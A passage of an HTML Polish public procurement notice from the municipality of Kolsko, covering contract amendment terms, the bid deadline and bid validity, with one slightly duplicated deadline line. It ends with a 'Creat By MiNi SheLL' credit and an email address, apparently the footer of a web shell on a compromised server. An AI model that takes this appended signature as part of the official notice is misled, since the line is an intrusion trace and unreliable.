e) Strony mogą przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, który wyniknął z powodu: 
- nie uzyskania uzgodnień w terminach ustawowych, przy dołożeniu ze strony Wykonawcy maksymalnych starań w celu ich uzyskania, poświadczonych stosownymi dokumentami, 
- zmian dokumentacji projektowej, dokonywanych na wniosek Zamawiającego, 
- siły wyższej; 
f) Wykonawca nie będzie miał prawa do przedłużenia terminu wykonania umowy, jeżeli Zamawiający udowodni, że przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy; 
g) w przypadku uniemożliwienia rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu z przyczyn leżących po stronie Zamawiającego, termin wykonania prac ulega przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia prac; 
h)  zmiana wynagrodzenia może nastąpić w przypadku ustawowej zmiany stawki podatku VAT; 
i)   wynagrodzenie może ulec zmniejszeniu w przypadku odstąpienia przez Zamawiającego od realizacji części przedmiotu zamówienia oraz w przypadku odstąpienia od umowy przez Strony. 
2. Warunki zmian:
a) inicjowanie zmian - na wniosek wykonawcy lub zamawiającego, 
b) zgoda obu stron umowy,
c) uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót i prac,
d) forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kolsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kolsko, ul. Piastowska 12, 67-415 Kolsko, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 09:00, miejsce: 07.07.2014 godzina 09:00, miejsce: Urząd Gminy Kolsko, ul. Piastowska 12, 67-415 Kolsko, pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com